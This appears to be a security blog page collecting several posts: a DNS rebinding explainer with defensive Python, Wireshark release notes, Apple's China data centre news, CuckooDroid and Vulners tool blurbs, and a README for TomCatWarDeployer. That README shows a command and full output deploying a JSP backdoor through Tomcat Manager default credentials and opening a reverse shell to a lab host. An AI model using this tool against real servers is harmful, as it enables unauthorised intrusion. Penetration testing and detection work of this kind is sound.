Showing posts with label Network. Show all posts

What is DNS Rebinding Attack? It's Work And Protection

What is a DNS rebinding attack?
DNS rebinding is a form of computer attack, specifically a domain-name-based attack. In this attack, a malicious web page causes visitors to run a client-side script that attacks machines elsewhere on the network.

A DNS rebinding attack can be used to breach a private network by causing the victim's web browser to access machines at private IP addresses and return the results to the attacker. It can also be employed to use the victim machine for spamming, distributed denial-of-service attacks or other malicious activities.

Cybercriminals can also carry out a DNS rebinding attack via malicious advertising (malvertising) and then gain access to private data on the network.

How does DNS rebinding work?
The attacker registers a domain (such as anydomain.com) and delegates it to a DNS server under the attacker's control. The server is configured to respond with a very short time to live (TTL) record, preventing the response from being cached. When the victim browses to the malicious domain, the attacker's DNS server first responds with the IP address of a server hosting the malicious client-side code.

For example, they could point the victim's browser to a website that contains malicious JavaScript or Flash scripts that are intended to execute on the victim's computer.

The malicious client-side code makes additional accesses to the original domain name (such as attacker.com). These are permitted by the same-origin policy. However, when the victim's browser runs the script it makes a new DNS request for the domain, and the attacker replies with a new IP address. For instance, they could reply with an internal IP address or the IP address of a target elsewhere on the Internet.

How can we protect ourselves?
The following techniques attempt to prevent DNS rebinding attacks:
  • Always use a strong password on your router.
  • Disable access to your router's admin console from any external network.
  • Web browsers can implement DNS pinning: the IP address is locked to the value received in the first DNS response. This technique may block some legitimate uses of Dynamic DNS, and may not work against all attacks. However, it is important to fail secure (stop rendering) if the IP address does change, because using an IP address past the TTL expiration can open the opposite vulnerability when the IP address has legitimately changed and the expired IP address may now be controlled by an attacker.
  • Private IP addresses can be filtered out of DNS responses.
  • External public DNS servers with this filtering, e.g. OpenDNS.
  • Local sysadmins can configure the organization's local nameservers to block the resolution of external names into internal IP addresses. This has the downside of allowing an attacker to map the internal address ranges in use.
  • DNS filtering in a firewall or daemon, e.g. dnswall.
  • Web servers can reject HTTP requests with an unrecognized Host header.
  • The Firefox NoScript extension provides partial protection (for private networks).

DNS rebinding was first discovered in 1996 and affected the Java virtual machine.
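As an added example (not from the original post), here are two of the mitigations listed above in Python: a dnswall-style filter that drops A/AAAA records pointing at private ranges, and a browser-side pinning resolver that fails secure when a name's address changes between lookups. The record tuples, the attacker's lookup sequence and the 203.0.113.10 address are constructed for the demonstration.

```python
import ipaddress
from typing import Callable, Dict, List, Optional, Tuple

# Ranges a rebinding filter (dnswall-style) refuses to return for external names.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

Record = Tuple[str, str, int, str]   # (name, type, ttl, data)


def is_internal(addr: str) -> bool:
    """True if addr falls in a range an external name must never resolve to."""
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 so ::ffff:10.0.0.1 is judged as 10.0.0.1.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)


def filter_answers(answers: List[Record]) -> Tuple[List[Record], List[Record]]:
    """Split answer records into (kept, dropped).

    A/AAAA records pointing at internal ranges are dropped; all other
    record types pass through untouched.
    """
    kept: List[Record] = []
    dropped: List[Record] = []
    for rr in answers:
        _name, rtype, _ttl, data = rr
        if rtype in ("A", "AAAA") and is_internal(data):
            dropped.append(rr)
        else:
            kept.append(rr)
    return kept, dropped


class PinningResolver:
    """Browser-side DNS pinning: the first address seen for a name is locked.

    As the post notes, pinning must fail secure: a later, different answer
    yields None (stop rendering) instead of the new address.
    """

    def __init__(self, lookup: Callable[[str], str]):
        self._lookup = lookup            # upstream resolver: name -> address
        self._pins: Dict[str, str] = {}

    def resolve(self, name: str) -> Optional[str]:
        addr = self._lookup(name)
        pinned = self._pins.setdefault(name, addr)
        if pinned != addr:
            return None                  # address changed: fail secure
        return addr


def simulate_rebinding() -> Tuple[Optional[str], Optional[str]]:
    """Constructed attacker behaviour: public IP first, private IP on re-query."""
    sequence = iter(["203.0.113.10", "192.168.1.1"])
    resolver = PinningResolver(lambda _name: next(sequence))
    first = resolver.resolve("anydomain.com")    # pinned to 203.0.113.10
    second = resolver.resolve("anydomain.com")   # rebind attempt -> None
    return first, second
```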

WireShark Version 2.4.0 Released With New Features

Wireshark is the world's most popular open source network protocol analyzer. It is used for troubleshooting, analysis, development and education.


New and updated capture file support for ERF, IxVeriWave, Libpcap, and Pcap-ng; there are also major API changes: in IEEE 802.11 the wlan_mgt display filter element has been renamed to wlan, and Libgcrypt is now a required dependency.

A total of 21 issues were fixed in Wireshark 2.2.8.



  1. Experimental 32-bit and 64-bit Windows Installer (.msi) packages are available. It is recommended that you use these independently of the NSIS (.exe) installers. That is, you should make sure the NSIS package is completely uninstalled before installing the Windows Installer package and vice-versa.
  2. Source packages are now compressed using xz instead of bzip2.
  3. The legacy (GTK+) UI is disabled by default in the Windows installers.
  4. The legacy (GTK+) UI is disabled by default in the development environment (Autotools and CMake).
  5. SS7 Point Codes can now be resolved into names with a hosts-like file.
  6. Wireshark can now go fullscreen to have more room for packets.
  7. TShark can now export objects like the other GUI interfaces.
  8. Support for G.722 and G.726 codecs in the RTP Player (via the SpanDSP library).
  9. You can now choose the output device when playing RTP streams.
  10. Added support for dissectors to include a unit name natively in their hf field. A field can now automatically append "seconds" or "ms" to its value without additional printf-style APIs.
  11. The Default profile can now be reset to default values.
  12. You can move back and forth in the selection history in the Qt UI.
  13. IEEE 802.15.4 dissector now uses an UAT for decryption keys. The original decryption key preference has been obsoleted.
  14. Extcap utilities can now provide configuration for a GUI interface toolbar to control the extcap utility while capturing.
  15. Extcap utilities can now validate the capture filter.
  16. Display filter function len() can now be used on all string and byte fields.
  17. Added an experimental timeline view for 802.11 wireless packet data which can be enabled via the "802.11 radio information" preferences.
  18. Added TLS 1.3 (draft 21) dissection and decryption support (Bug 12779).
  19. The (D)TLS Application Layer protocol (e.g. HTTP or CoAP) can now be changed via the Decode As dialog.
  20. The RSA keys dialog for SSL keys has improved feedback for invalid settings and no longer requires the IP address, Port or Protocol fields to be set in addition to the Key File.
  21. TCP Analysis will detect and flag more spurious retransmissions.

New Protocol Support


Bluetooth HCI Vendor Intel, CAN FD, Citrix NetScaler Metric Exchange Protocol, Citrix NetScaler RPC Protocol, DirectPlay 8 protocol, Ericsson A-bis P-GSL, Ericsson A-bis TFP (Traffic Forwarding Protocol), Facebook Zero, Fc00/cjdns Protocol, Generic Netlink (genl), GSM Osmux, GSMTAP based logging, Health Level 7 (HL7), High-speed SECS message service (HSMS), HomePNA, IndigoCare iCall protocol, IndigoCare Netrix protocol, iPerf2, ISO 15765, Linux 802.11 Netlink (nl80211), Local Service Discovery (LSD), M2 Application Protocol, Mesh Link Establishment (MLE), MUDURL, Netgear Ensemble Protocol, NetScaler HA Protocol, NetScaler Metric Exchange Protocol, NetScaler RPC Protocol, NM protocol, Nordic BLE Sniffer, NVMe, NVMe Fabrics RDMA, OBD-II PIDs, OpenThread simulator, RFTap Protocol, SCTE-35 Digital Program Insertion Messages, Snort Post-dissector, Thread CoAP, UDP based FTP w/ multicast (UFTP and UFTP4), Unified Diagnostic Services (UDS), vSocket, Windows Cluster Management API (clusapi), and X-Rite i1 Display Pro (and derivatives) USB protocol.

You can download Wireshark here

Apple Opening its First Data Center in China With Promise Full Data Privacy

Apple Opening its First Data Center in China With Promise Full Data Privacy And New CyberSecurity Rules.


The new data center will open in Guizhou; the company also has to form a joint venture with a local firm, as required by the country's regulations.


Apple also stated that it has strong data privacy and security protections in place: "No backdoors will be created into any of our systems."

"In partnership with a local internet services company, Guizhou on the Cloud Big Data, we’re proud of the fact the facility will be fully powered by 100 percent renewable energy like all of our other data centers around the world,” Apple said in a statement sent to SecurityWeek.


"Our Chinese customers love using iCloud to store their photos, videos, documents and apps securely, and to keep them updated across all of their devices. We're committed to continuously improving the user experience, and the addition of this data center will allow us to improve the speed and reliability of our products and services while also complying with newly passed regulations.

Apple has strong data privacy and security protections in place and no backdoors will be created into any of our systems," it said in the statement released Wednesday.

The firm did not give any financial details of the project, but China's state-run Xinhua news agency said it was part of a $1 billion investment. China has hundreds of millions of smartphone users and is a vital market for Apple, whose iPhones are wildly popular in the country.

Fu Liang, a Beijing-based independent telecom analyst, said more foreign data centres are expected under the cyber-security legislation. "The new rule requires this key information to be put in China. The boundary is very clear," Fu said.
He said the ramifications for Apple and other companies could be higher costs and potentially more restrictions under Chinese law.

"For (Apple) users, the good thing is their user experience like download speed will improve but the downside is that their access to overseas services and resources will be reduced," Fu added.
"It will be harder for them to access services that aren't allowed in China now."

TomCatWarDeployer: Apache Tomcat Auto WAR Deployment And Pwning Penetration Testing Tool



Apache Tomcat auto WAR deployment & pwning penetration testing tool.


What is it?

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, as well as invoke it afterwards and provide a nice shell (either via a web GUI, a listening port bound on the remote machine, or a reverse TCP payload connecting back to the adversary).

In practice, it generates a JSP backdoor WAR package on the fly and deploys it through the Apache Tomcat Manager application, using valid HTTP authentication credentials that the pentester provided (or custom ones; in the end, we all love tomcat:tomcat).

Usage

As simple as providing the server's address with port, as an IP:PORT pair. Here is the help:

user$ python tomcatWarDeployer.py --help

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Usage: tomcatWarDeployer.py [options] server

server    Specifies server address. Please also include port after colon.

Options:
  -h, --help     show this help message and exit

  General options:
    -v, --verbose       Verbose mode.
    -s, --simulate      Simulate breach only, do not perform any offensive
                        actions.
    -G OUTFILE, --generate=OUTFILE
                        Generate JSP backdoor only and put it into specified
                        outfile path then exit. Do not perform any
                        connections, scannings, deployment and so on.
    -U USER, --user=USER
                        Tomcat Manager Web Application HTTP Auth username.
                        Default="tomcat"
    -P PASS, --pass=PASS
                        Tomcat Manager Web Application HTTP Auth password.
                        Default="tomcat"


Connection options:
    -H RHOST, --host=RHOST
                        Remote host for reverse tcp payload connection. When
                        specified, RPORT must be specified too. Otherwise,
                        bind tcp payload will be deployed listening on 0.0.0.0
    -p PORT, --port=PORT
                        Remote port for the reverse tcp payload when used with
                        RHOST or Local port if no RHOST specified thus acting
                        as a Bind shell endpoint.
    -u URL, --url=URL   Apache Tomcat management console URL. Default:
                        /manager/
    -t TIMEOUT, --timeout=TIMEOUT
                        Speciifed timeout parameter for socket object and
                        other timing holdups. Default: 10

Payload options:
    -R APPNAME, --remove=APPNAME
                        Remove deployed app with specified name. Can be used
                        for post-assessment cleaning
    -X PASSWORD, --shellpass=PASSWORD
                        Specifies authentication password for uploaded shell,
                        to prevent unauthenticated usage. Default: randomly
                        generated. Specify "None" to leave the shell
                        unauthenticated.
    -T TITLE, --title=TITLE
                        Specifies head>title for uploaded JSP WAR payload.
                        Default: "JSP Application"
    -n APPNAME, --name=APPNAME
                        Specifies JSP application name. Default: "jsp_app"
    -x, --unload        Unload existing JSP Application with the same name.
                        Default: no.
    -C, --noconnect     Do not connect to the spawned shell immediately. By
                        default this program will connect to the spawned
                        shell, specifying this option let's you use other
                        handlers like Metasploit, NetCat and so on.
    -f WARFILE, --file=WARFILE
                        Custom WAR file to deploy. By default the script will
                        generate own WAR file on-the-fly.

And sample usage on Kevgir 1 VM by canyoupwn.me running at 192.168.56.100:8080 :

user$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

    tomcatWarDeployer (v. 0.3)
    Apache Tomcat 6/7 auto WAR deployment & launching tool
    Mariusz B. / MGeeky '16

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 192.168.56.102:4449.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmpDhzo9I"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1595)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpDhzo9I
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp

3 directories, 3 files
WARNING: Application with name: "jsp_app" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Succeeded.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpDhzo9I"
DEBUG: Succeeded, invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/jsp_app/"
DEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.
DEBUG: Incoming client: 192.168.56.100:54251
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'
DEBUG: Connected with the shell: tomcat7@canyoupwnme

tomcat7@canyoupwnme $ id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

tomcat7@canyoupwnme $ exit

The program will set up a local listener for the reverse-shell connection on 192.168.56.102:4449 (the local host), as in the example above. Then, after invoking the JSP backdoor, it will automatically connect with the local listener, resulting in a shell being popped. One can also skip the -H parameter in order to use the bind-shell functionality, in which case, rather than setting up a local listener, the program will connect to the remotely listening bind shell.

Finally, the above invocation results in the following JSP application, accessible remotely via the web:



(Screenshot: JSP backdoor GUI)

As one can see, a password is needed to use the deployed backdoor, thus preventing unauthenticated access during the assessment.

Summing up, the user has spawned a web application providing a web backdoor, authenticated via a POST 'password' parameter that can be specified by the user or randomly generated by the program. Then, upon receiving the X-Pass header in the invocation phase, the application spawned a reverse connection to our netcat handler. The HTTP header is required here to prevent a user refreshing the web GUI from repeatedly trying to bind or reverse connect. It also means authentication is required to reach that code.
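As an added example from the defender's side (not part of the tool or its README), here is a Python check over Tomcat access log lines that flags deployment changes made through the Manager application from non-local sources, and the first request to a context that appears right after such a change, which is the footprint a run like the one above leaves behind. The log lines are constructed in Tomcat's default AccessLogValve format with invented timestamps; the set of allowed Manager sources is an assumption.

```python
import re
from typing import List, Set

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager URLs that change what is deployed (HTML GUI and text interface).
MANAGER_CHANGE = re.compile(
    r'^/manager/(?:html/(?:upload|deploy|undeploy|stop|start)'
    r'|text/(?:deploy|undeploy))(?:[?/]|$)'
)
# Assumption: the Manager app is only administered from the local machine.
ALLOWED_MANAGER_SOURCES: Set[str] = {"127.0.0.1", "::1"}

# Constructed log lines modelled on the run shown above (timestamps invented).
SAMPLE_LOG = """\
192.168.56.102 - tomcat [19/Jul/2016:10:00:01 +0000] "GET /manager/ HTTP/1.1" 200 11234
192.168.56.102 - tomcat [19/Jul/2016:10:00:02 +0000] "GET /manager/html HTTP/1.1" 200 15678
192.168.56.102 - tomcat [19/Jul/2016:10:00:03 +0000] "POST /manager/html/undeploy?path=/jsp_app HTTP/1.1" 200 15700
192.168.56.102 - tomcat [19/Jul/2016:10:00:04 +0000] "POST /manager/html/upload HTTP/1.1" 200 15800
192.168.56.102 - - [19/Jul/2016:10:00:05 +0000] "GET /jsp_app/ HTTP/1.1" 200 4684
10.0.0.7 - - [19/Jul/2016:10:00:06 +0000] "GET /shop/index.jsp HTTP/1.1" 200 2048
""".splitlines()


def context_of(path: str) -> str:
    """Top-level context name of a request path ('/jsp_app/x' -> 'jsp_app')."""
    first = path.split("?", 1)[0].split("/")[1] if "/" in path else ""
    return first or "ROOT"


def detect(lines: List[str]) -> List[str]:
    """Return alert strings for Manager deployment changes and newly invoked contexts."""
    alerts: List[str] = []
    changed_by: Set[str] = set()                    # sources that altered deployments
    seen_contexts: Set[str] = {"manager", "ROOT"}   # contexts treated as pre-existing
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                # not in the expected log format
        src, path, status = m["src"], m["path"], m["status"]
        context = context_of(path)
        if MANAGER_CHANGE.match(path) and status.startswith(("2", "3")):
            changed_by.add(src)
            if src not in ALLOWED_MANAGER_SOURCES:
                alerts.append(f"{src} changed deployments via {path} (status {status})")
        elif (context not in seen_contexts and src in changed_by
              and status.startswith("2")):
            alerts.append(f"{src} invoked new context /{context}/ after using the Manager")
        seen_contexts.add(context)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```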

That would be all I guess.

CHANGELOG

19.07.16: Version 0.3: Added bind-shell & Reverse-shell functionality to provide user with direct access to the shell.

TODO


  1. Implement bind & reverse tcp payload functionality as well as some pty to interact with it
  2. Finish implementing noconnect and connect functionality
  3. Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
  4. Test it on tomcat8
     

CuckooDroid - Automated Android Malware Analysis Tool



CuckooDroid - Automated Android Malware Analysis with Cuckoo Sandbox.



CuckooDroid is an extension of Cuckoo Sandbox, the open source software for automating the analysis of suspicious files; CuckooDroid brings to Cuckoo the capability to execute and analyse Android applications.

CuckooDroid features VM-detection techniques, encryption key extraction, SSL inspection, API call tracing and basic behavioural signatures. It also provides both static and dynamic APK inspection.

Installation - Easy integration script:

git config --global user.email "you@example.com"
git config --global user.name "Your Name"
git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo -b 1.2
cd cuckoo
git remote add droid https://github.com/idanr1986/cuckoo-droid
git pull --no-edit -s recursive -X theirs droid master
cat conf-extra/processing.conf >> conf/processing.conf
cat conf-extra/reporting.conf >> conf/reporting.conf
rm -r conf-extra
echo "protobuf" >> requirements.txt

Download

Wireshark 2.2.0 Announced With New Features And Bug Fixes


Wireshark is a free and open source packet analyzer.

It is used for network troubleshooting, analysis, and software and communications protocol development.
Formerly known as Ethereal, Wireshark allows the user to put network interface controllers into promiscuous mode for sniffing and to see all the live traffic in the Wireshark interface.

New Bug Fixes



  • Upgrading to latest version uninstalls Microsoft Visual C++ redistributable. (Bug 12712)
  • Extcap errors not reported back to UI. (Bug 11892)

The following features are new (or have been significantly updated) since version 2.2.0rc2:


No major changes since 2.2.0rc2.

The following features are new (or have been significantly updated) since version 2.2.0rc1:

  • "Decode As" supports SSL (TLS) over TCP.

The following features are new (or have been significantly updated) since version 2.1.1:

  • Invalid coloring rules are now disabled instead of discarded. This will provide backward compatibility with a coloring rule change in Wireshark 2.2.

The following features are new (or have been significantly updated) since version 2.1.0:

  • Added -d option for Decode As support in Wireshark (mimics TShark functionality)
  • The Qt UI, GTK+ UI, and TShark can now export packets as JSON. TShark can additionally export packets as Elasticsearch-compatible JSON.
  • The Qt UI now supports the -j, -J, and -l flags. The -m flag is now deprecated.
  • The Conversations and Endpoints dialogs are more responsive when viewing large numbers of items.
  • The RTP player now allows up to 30 minutes of silence frames.
  • Packet bytes can now be displayed as EBCDIC.
  • The Qt UI loads captures faster on Windows.
  • proto_tree_add_checksum was added as an API. This attempts to standardize how checksums are reported and filtered for within *Shark. There are no more individual "good" and "bad" filter fields, protocols now have a "checksum.status" field that records "Good", "Bad" and "Unverified" (neither good or bad). Color filters provided with Wireshark have been adjusted to the new display filter names, but custom ones may need to be updated.

The following features are new (or have been significantly updated) since version 2.0.0:

  • The intelligent scroll bar now sits to the left of a normal scroll bar and provides a clickable map of nearby packets.
  • You can now switch between Capture and File Format dissection of the current capture file via the View menu in the Qt GUI.
  • You can now show selected packet bytes as ASCII, HTML, Image, ISO 8859-1, Raw, UTF-8, a C array, or YAML.
  • You can now use regular expressions in Find Packet and in the advanced preferences.
  • Name resolution for packet capture now supports asynchronous DNS lookups only. Therefore the "concurrent DNS resolution" preference has been deprecated and is a no-op. To enable DNS name resolution some build dependencies must be present (currently c-ares). If that is not the case DNS name resolution will be disabled (but other name resolution mechanisms, such as host files, are still available).
  • The byte under the mouse in the Packet Bytes pane is now highlighted.
  • TShark supports exporting PDUs via the -U flag.
  • The Windows and OS X installers now come with the "sshdump" and "ciscodump" extcap interfaces.
  • Most dialogs in the Qt UI now save their size and positions.
  • The Follow Stream dialog now supports UTF-16.
  • The Firewall ACL Rules dialog has returned.
  • The Flow (Sequence) Analysis dialog has been improved.
  • We no longer provide packages for 32-bit versions of OS X.
  • The Bluetooth Device details dialog has been added.
Source: Wireshark




Vulners: Software Vulnerability Scanner Plugin For Burp Suite Professional

Vulners scanner plugin released for automatic vulnerability detection in passive scan mode


vulnersCom/burp-vulners-scanner: Vulnerability scanner based on the vulners.com search API


Burp Suite scanner plugin based on Vulners.com vulnerability database API

  • Search for fingerprints in HTTP responses (inspired by the plugin "Software Version Reporter") and check the found version against the vulners.com vulnerability database
  • [Experimental] Check unique URLs against vulners.com to find exploits for such paths

If the Vulners plugin detects vulnerable software it will show you CVEs, advisories and even applicable exploits!

    Requirements

    • Burp Suite - Professional Edition
    • Java 1.7
    • Maven
     

    Installation

    • Clone repository
    • From command line run
    • mvn package
    • find burp-vulners-scanner.jar in /target folder
    • open Burp Suite -> Extender -> Add -> path to plugin.jar

    Build

    Ready to install build burp-vulners-scanner.jar

    Software Vulnerability scanner plugin for Burp Suite Professional
    Main functionality:
    • Detect vulnerable software by discovered fingerprints in HTTP responses
    • Check unique urls finding exploits with such paths
     
